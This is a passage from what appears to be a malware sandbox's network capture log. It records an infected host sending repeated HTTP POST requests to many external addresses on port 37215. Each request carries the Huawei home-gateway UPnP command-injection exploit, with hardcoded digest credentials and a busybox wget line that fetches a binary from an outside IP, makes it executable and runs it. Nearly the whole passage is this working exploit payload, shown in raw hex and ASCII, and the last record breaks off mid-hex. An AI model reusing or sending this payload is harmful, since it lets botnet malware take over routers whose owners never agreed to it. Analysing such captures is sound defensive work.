                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            160192.168.2.1538032197.249.38.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176636934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            161192.168.2.1560738197.134.84.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176677942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            162192.168.2.1548270197.116.121.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176692963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            163192.168.2.1539576197.166.63.2837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176711082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            164192.168.2.1538768197.217.7.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176768064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            165192.168.2.1535684197.26.89.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176769972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            166192.168.2.1558858197.87.23.23137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176796913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            167192.168.2.1538624197.130.172.537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176826000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            168192.168.2.1559290197.51.193.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176834106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            169192.168.2.1542256197.86.240.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176886082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 